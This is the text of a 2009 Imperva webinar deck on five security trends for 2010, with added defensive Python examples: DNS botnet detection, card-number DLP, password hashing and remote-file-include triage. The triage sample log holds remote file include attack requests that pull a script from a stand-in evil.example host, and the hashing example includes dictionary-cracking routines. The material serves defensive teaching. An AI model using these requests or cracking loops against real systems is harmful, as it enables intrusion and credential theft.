Top 5 Security Trends for 2010
Noa Bar-Yosef, Security Research Engineer, Imperva

Imperva Background
Imperva focuses on Application Data Security and Compliance
Application Defense Center (ADC)
+ Research organization headed by Amichai Shulman
+ Security analysis
+ Vulnerability discovery
+ Compliance expertise
+ Threat research
+ Education
Agenda
Scorecard for 2009 Security Trends
2010 Top Security Trends
+ Emerging threats, vendor security notification policies, and new security tactics
+ Strategies to mitigate today's security threats
Q&A
Scorecard for 2009 Security Trends

  #  Trend                                                  Score
  1  Disclosure becoming irresponsible                      A-
  2  Economics to affect threat level                       A
  3  Surge of cloud related threats                         C
  4  Evolution of automated attacks                         A+
  5  Increased threat to business applications (e.g. SAP)   C
  6  Proliferation of CSRF                                  D
#1 - The Industrialization of Hacking
Hacking is becoming a profitable industry
The foundations of any industry can be identified within hacking:
+ Building layered roles (supply chain)
+ Horizontal expertise
+ Resource optimization
+ Automation
Individual and political hacking have not ceased, but they have become a secondary threat
The Industrialization of Hacking
Layered Roles
Detect vulnerabilities and develop exploits
+ Hardcore "hackers" with strong technical capabilities
+ Stay clear of actual targets
+ Provide the building blocks for others
Grow botnets
+ Groups devoted to controlling as many zombies as possible
+ Complex operations (discussed later)
+ Provide zombies from the botnet for use by perpetrators
The Industrialization of Hacking
Layered Roles (cont.)
Exploit targets
+ Groups that make use of zombies for various purposes
+ Send spam
+ Collect data
+ Inflict DoS
Consumers
+ Monetize information
  – Credit card fraud
  – Identity theft
+ Advertise through spam
+ Blackmail
The Industrialization of Hacking
Resource Optimization
"Nothing is thrown in the garbage"
Each workstation or application, once compromised, is exploited in one way or another as part of the industrial food chain
Compromised applications
+ Direct value (fund transfers, credit card information, etc.)
+ Indirect value (credentials to other systems)
+ Malware distribution
+ Blackhat SEO
+ Command & Control
The Industrialization of Hacking
Resource Optimization (cont.)
Workstations
+ Keylogger for grabbing credentials
+ Specialized malware for man-in-the-browser attacks
+ General purpose Trojan to use as part of a botnet
+ Relay into internal networks
The Industrialization of Hacking
Automation
The core of the industrial process, growing botnets and exploiting targets, is mostly automated
Selecting target applications through search engines
Compromising applications using captured zombies
+ Configuration and commands are distributed through forums and web pages
Sometimes the compromise itself is carried out through search engine abuse
The Industrialization of Hacking
Automation (cont.)
Templates and kits exist for everything
+ Remote file include
+ Phishing of various applications
+ Botnet clients (ASPROX, Zeus, Clampi, etc.)
Looking at the numbers from attack campaigns clearly shows the power of automation
+ Last month we heard of 132K sites compromised in one campaign
+ We tracked a similar campaign three weeks earlier and saw the same flaw exploited in the same way across hundreds of sites
Techniques are becoming more sophisticated
+ Randomized DNS in order to avoid C&C hijacking
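The "randomized DNS" above (a bot computing candidate C&C hostnames instead of using fixed ones) leaves a recognisable trace in resolver logs. The following Python script is an added example, not part of the deck and not Imperva tooling: it scores labels that do not look like words (character entropy, vowel ratio) and then looks for clients that receive NXDOMAIN for many such names in a short window, which is what cycling through generated candidates looks like; the one generated-looking name that does resolve for such a client is the live C&C candidate. The log format, every hostname and client address, and all thresholds are constructed or assumed for the example.

```python
"""Added example, not part of the original deck or Imperva's products.

Two signals for DGA-style "randomized DNS" in resolver logs:
  1. per name: the registrable label has high entropy and few vowels
  2. per client: a burst of NXDOMAIN answers for many such names
The log format, every hostname, client address and threshold below are
constructed/assumed.
"""
import math
from collections import Counter, defaultdict

ENTROPY_MIN = 3.3       # assumption: bits per character; tune on your own baseline
VOWEL_RATIO_MAX = 0.25  # assumption: generated labels are rarely pronounceable
NXDOMAIN_BURST = 5      # assumption: distinct failing names per client in the window

# Constructed resolver log: "<epoch> <client> <qname> <rcode>", one query per line.
SAMPLE_LOG = """\
1259539200 10.0.0.5 www.imperva.com NOERROR
1259539201 10.0.0.5 mail.google.com NOERROR
1259539202 10.0.0.9 xk3f9qzlwpt0vb.com NXDOMAIN
1259539203 10.0.0.9 q7hzmxv2bdtrkp.net NXDOMAIN
1259539204 10.0.0.9 wjt4knzpxrgm8s.org NXDOMAIN
1259539205 10.0.0.9 zrp9vmkxtq3hwb.com NXDOMAIN
1259539206 10.0.0.9 bkvx7tzqhmp2dn.info NXDOMAIN
1259539207 10.0.0.9 tqm6xzvkpbh4rw.com NOERROR
1259539208 10.0.0.5 static.facebook.com NOERROR
1259539209 10.0.0.7 ww.exmaple.com NXDOMAIN
"""


def shannon_entropy(s: str) -> float:
    """Bits per character; 14 distinct characters score log2(14), about 3.8."""
    n = len(s)
    return -sum((c / n) * math.log2(c / n) for c in Counter(s).values())


def registrable_label(qname: str) -> str:
    """Label directly under the TLD. Assumption: no public-suffix list, so
    names under co.uk-style suffixes would be split wrongly; fine for the demo."""
    labels = qname.rstrip(".").split(".")
    return labels[-2] if len(labels) >= 2 else labels[0]


def looks_generated(label: str) -> bool:
    """Entropy alone also flags long legitimate names (a 15-letter brand label
    can reach 3.3 bits), so a low vowel ratio is required as a second condition."""
    if len(label) < 8:
        return False
    vowel_ratio = sum(ch in "aeiou" for ch in label) / len(label)
    return shannon_entropy(label) >= ENTROPY_MIN and vowel_ratio <= VOWEL_RATIO_MAX


def analyze(log_text: str) -> dict:
    suspicious, nx_by_client, ok_by_client = set(), defaultdict(set), defaultdict(set)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        _ts, client, qname, rcode = line.split()
        if not looks_generated(registrable_label(qname)):
            continue
        suspicious.add(qname)
        if rcode == "NXDOMAIN":
            nx_by_client[client].add(qname)
        elif rcode == "NOERROR":
            ok_by_client[client].add(qname)
    # A client failing on many generated-looking names is walking a DGA list.
    bursty = {c for c, names in nx_by_client.items() if len(names) >= NXDOMAIN_BURST}
    # The generated-looking name that did resolve for such a client is the live C&C candidate.
    likely_c2 = {q for c in bursty for q in ok_by_client[c]}
    return {"suspicious_names": suspicious, "bursty_clients": bursty, "likely_c2": likely_c2}


if __name__ == "__main__":
    for key, value in analyze(SAMPLE_LOG).items():
        print(f"{key}: {sorted(value)}")
```

The per-name heuristic is only a filter; the NXDOMAIN burst is the behavioural signal that turns it into an actionable finding (one client, one resolving name to block or sinkhole). Both thresholds need tuning against a baseline of your own traffic before use.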
The Industrialization of Hacking
Our Advice
We are no longer fighting script kiddies or sporadic hacking attempts; we are fighting Hackers Inc.
You cannot hide from the problem:
+ Small and large applications alike
+ Servers and workstations
+ It's not personal
Smaller organizations
+ Must start paying attention to application security
+ Either directly or through their hosting providers
Organizations must look for tools that help them detect and mitigate automation properly
#2 - From Application Security to Data Security
The 1990s were all about network security problems (connecting enterprise networks to the Internet) and network security solutions (the network firewall)
Throughout this decade we have seen a shift of activity towards web application attacks
+ Network security has become a commodity and network attacks are harder to execute
+ At the turn of the century eCommerce and online services took a steep climb; attacker motivation increases as applications expose more information and more functionality
+ It is far easier to access data through the applications designed to manipulate it
From application security to data security
Web Application Security is No Longer Enough
The internal threat is still prominent
Many internal applications are not web based
Web application security can be effectively applied to major internal applications, but not to all of them
Many times internal users have (authorized) direct access to the database
Once data flows from an application into a workstation it is on the loose
Regulations require that specific types of data be tracked
From application security to data security
Continuous Data Security
Track access to sensitive and regulated data throughout its lifecycle
Basic information lifecycle
+ Most sensitive and regulated data can be traced back to structured storage (SQL databases)
+ Sensitive information may be transformed into unstructured formats and placed in document storage and management systems (file shares, MS SharePoint, EMC Documentum)
+ Data is processed on workstations and may leave the enterprise boundaries through email, WebMail, file transfer and physical media

From application security to data security
Our Advice
Controls around individual data repositories
+ Database access monitoring
+ File activity monitoring
Controls to track data in process
+ Next generation of DLP products
+ Integration with DRM
Collaboration between data security products
+ Policies expressed in terms of information type based on content, rather than table and file names
+ Track specific pieces of information as they leave the database, flow through web applications, are transformed into files and flow through outgoing channels
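A policy "expressed in terms of information type based on content" has to recognise the information by its own shape, not by the container it sits in. The Python below is an added example (not from the deck, and not any DLP product's logic) of that idea for one information type, payment card numbers: the same value is found by its digit pattern and Luhn check digit whether it sits in a database row, a document on a share, or an outgoing message, and the value seen in the database and again on an outbound channel is the trace the advice above wants followed. All records and source names are constructed; the card numbers are the usual publicly documented test numbers.

```python
"""Added example, not part of the original deck or of any DLP product.

Content-based classification of one information type (payment card numbers)
across the three lifecycle stages on the slide, plus the simplest policy built
on it: a value that lives in structured storage and reappears on an outgoing
channel. All records and source names are constructed; the card numbers are
publicly documented test numbers.
"""
import re
from collections import defaultdict
from typing import Dict, List, Set, Tuple

# 13-19 digits optionally separated by spaces/hyphens, not embedded in a longer digit run.
PAN_RE = re.compile(r"(?<!\d)(?:\d[ -]?){13,19}(?!\d)")

# Constructed samples: database row, document on a share, outbound mail body.
SOURCES: Dict[str, str] = {
    "sql:customers": "id=42,name=Alice,card=4111 1111 1111 1111,phone=555-0100",
    "file:finance/Q4-refunds.txt": "Refund to 5500-0000-0000-0004 processed. Ref order 1234567890123456.",
    "smtp:outbound": "Hi, please charge 4111111111111111 again for the renewal. Thanks",
}


def luhn_ok(digits: str) -> bool:
    """Mod-10 check digit; rejects most 16-digit order/reference numbers."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d * 2 > 9 else d * 2
        total += d
    return total % 10 == 0


def find_pans(text: str) -> List[str]:
    """Card-shaped digit runs that also pass Luhn, with separators removed."""
    found = []
    for m in PAN_RE.finditer(text):
        digits = re.sub(r"[ -]", "", m.group())
        if luhn_ok(digits):
            found.append(digits)
    return found


def mask(pan: str) -> str:
    """First six and last four digits, as allowed for display."""
    return pan[:6] + "*" * (len(pan) - 10) + pan[-4:]


def classify(sources: Dict[str, str]) -> Dict[str, List[str]]:
    """Which sources hold card data, decided by the content alone."""
    return {name: find_pans(text) for name, text in sources.items()}


def track(sources: Dict[str, str]) -> Dict[str, Set[str]]:
    """Invert the classification: where has each specific value been seen?"""
    seen: Dict[str, Set[str]] = defaultdict(set)
    for name, pans in classify(sources).items():
        for pan in pans:
            seen[pan].add(name)
    return dict(seen)


def exfiltration_alerts(sources: Dict[str, str]) -> List[Tuple[str, str]]:
    """Policy: a value present in structured storage that shows up on an
    outgoing channel. Reports the masked value and the channel."""
    alerts = []
    for pan, places in track(sources).items():
        from_db = any(p.startswith("sql:") for p in places)
        for p in sorted(places):
            if from_db and p.startswith("smtp:"):
                alerts.append((mask(pan), p))
    return alerts


if __name__ == "__main__":
    for pan, places in track(SOURCES).items():
        print(mask(pan), sorted(places))
    print("alerts:", exfiltration_alerts(SOURCES))
```

The Luhn check is what keeps a content rule usable: the 16-digit order reference in the file sample has the right shape but fails the check digit, so it never becomes a false positive. A real deployment would add more information types (national IDs, account numbers) and fingerprint the database values rather than re-scanning them, but the policy stays the same: it names the data, not the table or file.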
#3 - Social Networks Expose Larger Societies
Past: specific parts of the population
+ Young adults of the Internet generation
Today / Future: everyone and their dog have a Facebook account
+ Younger, immature audience
  – Kids making their first steps into the virtual society
+ Conservative adult community
  – People who otherwise have very conservative web access behavior
+ Senior community
  – People whose trust models are deeply rooted in the old world (my grandmother)
Social networks expose larger societies
Pandemic Threats
There are three distinctive pillars of social networks that make them a perfect fit for online pandemic threats:
+ Huge crowds
+ They inherently expose personal information
+ Built-in mechanisms for implicit and explicit trust generation between loosely coupled individuals
Attackers can push their "merchandise" to larger unsuspecting crowds with higher than ever success rates
+ Use the implicit trust
+ Abuse the abundance of personal information to create more trust
Social networks expose larger societies
The Evolution of an Octopus
Social networks are becoming social platforms
+ Integrating MMORPGs (e.g. Farmville) and 3rd party apps
+ More opportunities for trust abuse
  – ClickJacking through Farmville gifts
+ Less control over the robustness of integrated applications
Integrating social networks into other domains
+ Google, Bing and Yahoo! integrating Twitter and Facebook results
+ Promoting malware just became much easier!
Social networks expose larger societies
The Evolution of an Octopus (cont.)
Integrating social networks into the enterprise
+ HR systems, CRM systems
+ Creating a Mobius strip of information, mixing internal and external trust

Dear Amichai,
We'd like your help to spread the word about our open jobs. If you follow the link below and install this application on your Facebook profile page, your friends will be able to see, apply and forward our jobs. The best part is that if your friend, or a friend of a friend, applies for a job and is hired, you will automatically get credit for the employee referral through Jobvite. You will be eligible for the referral bonus.
To install the application, please follow this link: here
Best regards,
Douglas

Dear John,
We'd like your help to spread the word about our open jobs. If you follow the link below and install this application on your Facebook profile page, your friends will be able to see, apply and forward our jobs. The best part is that if your friend, or a friend of a friend, applies for a job and is hired, you will automatically get credit for the employee referral through Jobvite. You will be eligible for the referral bonus.
To install the application, please follow this link: here
Best regards,
Sue
Social networks expose larger societies
Our Advice - Redefining Trust
Social networks are all about novelty
+ We can expect them to rush new features out at the expense of security
+ As more 3rd party apps are created, we cannot expect them to consider security at all
We need tools to help us evaluate trust in huge, dynamic, virtual societies
+ These are starting to show up as research projects or initial offerings from various vendors
Security tools and policies should be able to build on these trust systems
#4 - Credentials Are the New Credit Card Numbers
Dramatic surge in the number of data compromise incidents
+ Credit card numbers
+ Personal details
Price levels per single stolen record are constantly dropping
+ Attackers are looking for more profitable targets
We clearly see an increased level of activity around hacking user credentials for online applications
Application credentials are the new CCNs
Motivation
Credit card numbers are harder to monetize
+ Need to purchase goods and cash those out
Personal details are even harder to monetize
+ Cannot be used en masse
+ Require additional fraud (involving identity theft)
The premise of application credentials
+ Easier to monetize
+ Higher value per record
Application credentials are the new CCNs
Motivation (cont.)
Financial applications
+ Can easily be converted into hard cash through online transactions (fund transfers, stock trading, etc.)
Enterprise in the cloud (SalesForce.com, GoogleDocs, etc.)
+ Access to sensitive commercial information
+ Can be traded for money, used for fraudulent transactions and even blackmail
Web mail
+ Direct access to personal details
+ Further access to the above mentioned applications
+ Spam
Application credentials are the new CCNs
Tools of the Trade
Keyloggers
+ Cleartext passwords
+ Once a computer is infected, quality data flows in
+ Require massive botnets of infected machines
Phishing attacks
+ Cleartext passwords
+ Low quality data
+ Low success rates
Application compromise (e.g. SQL injection)
+ Sometimes digested passwords that need further cracking
+ High quality data
+ Huge numbers
Application credentials are the new CCNs
Our Advice
Protect your web facing applications
+ Defeat attacks
Store digested passwords
+ Defeat exposure in case of compromise
Use safe password recovery procedures
+ Avoid automatic leveraging of another compromise
Include two factor authentication
+ When possible
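"Store digested passwords" only defeats exposure if the digest is salted and slow; the "Tools of the Trade" slide already notes that dumped digests "need further cracking", and an unsalted fast hash makes that cracking cheap and reusable across every user in the dump. The Python below is an added example (not from the deck, and not any product's code) that puts a legacy unsalted-MD5 store next to a salted PBKDF2 store and runs the same dictionary attack against both, counting hash operations. The user names, passwords, wordlist and iteration count are constructed or assumed for the example.

```python
"""Added example, not part of the original deck or of any Imperva product.

Legacy store: unsalted MD5, the kind of table a SQL injection dump contains.
Hardened store: per-user random salt + iterated PBKDF2-HMAC-SHA256, verified
in constant time. The same dictionary attack is run against both and the
number of hash computations is counted. Users, passwords, wordlist and the
iteration count are constructed/assumed.
"""
import hashlib
import hmac
import os
from typing import Dict, Optional, Tuple

PBKDF2_ITERATIONS = 100_000  # assumption: choose so one verify costs ~100 ms on your servers
SALT_BYTES = 16

# Constructed attacker wordlist and constructed user table.
WORDLIST = ["123456", "password", "qwerty", "password123", "letmein", "monkey"]
USERS = {"alice": "password123", "bob": "correct horse battery staple"}


def legacy_hash(password: str) -> str:
    """Unsalted MD5: identical passwords give identical digests across all users."""
    return hashlib.md5(password.encode()).hexdigest()


def hardened_hash(password: str, salt: Optional[bytes] = None) -> str:
    """Random per-user salt plus iterated PBKDF2. The parameters are stored with
    the digest so the iteration count can be raised later without a schema change."""
    salt = salt if salt is not None else os.urandom(SALT_BYTES)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return f"pbkdf2_sha256${PBKDF2_ITERATIONS}${salt.hex()}${dk.hex()}"


def verify_hardened(password: str, stored: str) -> bool:
    algo, iters, salt_hex, dk_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iters))
    # Constant-time comparison: do not leak how many leading bytes matched.
    return hmac.compare_digest(dk, bytes.fromhex(dk_hex))


def crack_legacy(dump: Dict[str, str], wordlist) -> Tuple[Dict[str, str], int]:
    """One MD5 per wordlist entry builds a lookup table that serves every user."""
    table, ops = {}, 0
    for w in wordlist:
        table[legacy_hash(w)] = w
        ops += 1
    return {u: table[d] for u, d in dump.items() if d in table}, ops


def crack_hardened(dump: Dict[str, str], wordlist) -> Tuple[Dict[str, str], int]:
    """The salt defeats the shared table: full PBKDF2 cost per candidate, per user."""
    cracked, ops = {}, 0
    for u, stored in dump.items():
        for w in wordlist:
            ops += 1
            if verify_hardened(w, stored):
                cracked[u] = w
                break
    return cracked, ops


def demo() -> dict:
    legacy_dump = {u: legacy_hash(p) for u, p in USERS.items()}
    hardened_dump = {u: hardened_hash(p) for u, p in USERS.items()}
    legacy_cracked, legacy_ops = crack_legacy(legacy_dump, WORDLIST)
    hardened_cracked, hardened_ops = crack_hardened(hardened_dump, WORDLIST)
    return {
        "legacy_cracked": legacy_cracked, "legacy_ops": legacy_ops,
        "hardened_cracked": hardened_cracked, "hardened_ops": hardened_ops,
        "hardened_work_per_op": PBKDF2_ITERATIONS,
    }


if __name__ == "__main__":
    print(demo())
```

Note what the run shows: alice's weak password falls under both schemes, because hashing cannot fix a password that is in the attacker's wordlist; that is the case for the two-factor bullet above. What the hardened scheme changes is the economics of the "huge numbers" slide: the attacker pays PBKDF2_ITERATIONS hash rounds per guess per user instead of one MD5 per guess for the whole dump, and a leaked table of digests no longer cracks in bulk.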
#5 - Proactive Security
To date the security concept has been largely reactive:
+ Wait for a vulnerability to be disclosed
+ Create a signature (or some other security rule)
+ Cross reference requests against these attack methods, regardless of their context in time or source
As a consequence security decisions are becoming more difficult and resource consumption (machine as well as human) is growing
+ Distinguishing "bad" requests from "good" requests based on request content alone becomes more difficult and more time consuming
+ Not only machine resources but also human resources, as more decisions cannot be taken automatically
+ This is completely inadequate in a world of growing attack rates
Proactive security
Tired of Being a Sitting Duck?
Rather than waiting to be attacked, security research teams are starting to proactively look for attacker activity as it is being initiated over the network
Traditionally used for longer term research, proactive intelligence operations can be used for immediate security value:
+ Identify compromised computers being actively exploited to launch attacks
+ Quickly identify attack campaigns at their early stages
+ Discover 0-day vulnerabilities in the wild rather than in the lab
+ Identify targets of upcoming attacks in advance
Proactive security
Military Intelligence is a Contradiction in Terms*
There are different techniques for gathering timely intelligence
+ Some techniques, especially those related to the spam domain, have already been in use for a couple of years
Some techniques are based on a network of sensors. Basic types of sensors:
+ Setting up targets for attacks (fake web applications, mailboxes to receive spam, etc.)
+ Setting up communication channels for use by attackers (anonymous proxies, Tor relays)
+ Network sniffers in strategic locations
+ Tapping into C&C servers
* Groucho Marx
Proactive security
Military Intelligence (cont.)
Other techniques are more laborious
+ Reverse engineer new malware to identify C&C servers
+ Hijack domain names intended for use by botnets
+ Tap into hacker discussions in forums and
Existing projects and commercial offerings for various types of threats (sample):
+ DShield (general reputation for IPs)
+ ShadowServer (botnet oriented)
+ Cyveillance (phishing and compromised servers)
+ Project Honeypot (spam related)
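What the reactive model on the "#5" slide lacks is "context in time or source"; what the sensor networks and feeds listed above supply is exactly that context. The Python below is an added example (not from the deck, and not the format or API of DShield, ShadowServer or any other provider named above) of putting the two together at a web front end: a content-only rule for the remote file include pattern the kits use is combined with a source reputation lookup and with time-bound correlation of the same payload across many sites, so that a campaign is recognised even from an address no feed has seen yet, while a lone request that merely matches the content rule is sent to review instead of being blocked. All log lines, addresses, hostnames and thresholds are constructed or assumed.

```python
"""Added example, not part of the original deck or of any product or feed it names.

Content rule + source reputation + cross-site correlation for web request triage.
The reputation feed is a constructed dict (real feeds have their own formats);
the access log lines are constructed Apache "combined" lines with the virtual
host prepended (%v); the thresholds are assumptions.
"""
import re
from collections import defaultdict
from datetime import datetime
from typing import Dict, List, Optional, Tuple
from urllib.parse import parse_qs, urlsplit

CAMPAIGN_MIN_SITES = 3          # assumption: same payload against >= 3 distinct sites
CAMPAIGN_WINDOW_SECONDS = 3600  # assumption: ... within one hour

# Constructed reputation feed: source address -> why it is listed.
REPUTATION = {
    "198.51.100.7": "compromised-host",  # a zombie already seen attacking elsewhere
    "203.0.113.40": "scanner",
}

SAMPLE_LOG = """\
shop.example.com 198.51.100.7 - - [01/Dec/2009:10:00:01 +0000] "GET /index.php?page=http://evil.example/s.txt? HTTP/1.1" 200 512 "-" "libwww-perl/5.8"
blog.example.org 198.51.100.7 - - [01/Dec/2009:10:00:02 +0000] "GET /index.php?page=http://evil.example/s.txt? HTTP/1.1" 404 120 "-" "libwww-perl/5.8"
forum.example.net 192.0.2.50 - - [01/Dec/2009:10:00:30 +0000] "GET /index.php?page=http://evil.example/s.txt? HTTP/1.1" 200 498 "-" "libwww-perl/5.8"
shop.example.com 192.0.2.88 - - [01/Dec/2009:10:02:00 +0000] "GET /redirect?url=http://partner.example/offer HTTP/1.1" 302 0 "-" "Mozilla/5.0"
shop.example.com 192.0.2.99 - - [01/Dec/2009:10:03:00 +0000] "GET /about.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
blog.example.org 203.0.113.40 - - [01/Dec/2009:10:05:00 +0000] "GET /wp-login.php HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<vhost>\S+) (?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)

Signature = Tuple[str, str, str]  # (path, parameter, host of the included URL)


def parse_line(line: str) -> Optional[dict]:
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec


def rfi_signature(url: str) -> Optional[Signature]:
    """Content-only rule: a query parameter whose value is itself a URL.
    Returns a normalized key so the same kit payload matches across sites."""
    parts = urlsplit(url)
    for param, values in parse_qs(parts.query).items():
        for value in values:
            if value.startswith(("http://", "https://")):
                return (parts.path, param, urlsplit(value).hostname or "")
    return None


def triage(log_text: str, feed: Dict[str, str]):
    records = [r for r in map(parse_line, log_text.splitlines()) if r]
    for r in records:
        r["signature"] = rfi_signature(r["url"])
        r["reputation"] = feed.get(r["ip"])

    # Time/source context: identical payload hitting many sites inside the window.
    by_sig: Dict[Signature, List[dict]] = defaultdict(list)
    for r in records:
        if r["signature"]:
            by_sig[r["signature"]].append(r)
    campaigns = {}
    for sig, rs in by_sig.items():
        span = (max(x["ts"] for x in rs) - min(x["ts"] for x in rs)).total_seconds()
        sites = {x["vhost"] for x in rs}
        if len(sites) >= CAMPAIGN_MIN_SITES and span <= CAMPAIGN_WINDOW_SECONDS:
            campaigns[sig] = sites

    rows = []
    for r in records:
        in_campaign = r["signature"] is not None and r["signature"] in campaigns
        if r["reputation"] or in_campaign:
            verdict = "block"   # context backs the decision; no analyst needed
        elif r["signature"]:
            verdict = "review"  # content matched, but it may be a legitimate redirect
        else:
            verdict = "allow"
        rows.append({"vhost": r["vhost"], "ip": r["ip"], "reputation": r["reputation"],
                     "content_match": r["signature"] is not None,
                     "campaign": in_campaign, "verdict": verdict})
    return rows, campaigns


if __name__ == "__main__":
    rows, campaigns = triage(SAMPLE_LOG, REPUTATION)
    for row in rows:
        print(row)
    print("campaigns:", campaigns)
```

The third log line is the interesting one: its source is on no feed, but the same normalized payload has just hit two other sites, so it is blocked as part of a campaign "at its early stage". The fourth line matches the same content rule and would be a false positive for a signature-only engine; with no reputation hit and no cross-site repetition it goes to review rather than consuming a block. The constructed feed stands in for the providers listed above; in practice the lookup is against their data, refreshed on their schedule.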
Proactive security
Our Advice
Engaging in proactive security requires substantial research resources; do not expect to do it yourself
Some solutions (mainly around endpoint security) are incorporating data obtained through proactive security
The next generation of enterprise solutions will include integration of data obtained from proactive security projects and providers
Add proactive security to your wish list when looking at enterprise solutions
Security Trends that just missed the Top 5
Questions & Answers
ADC Data Security Webinar Series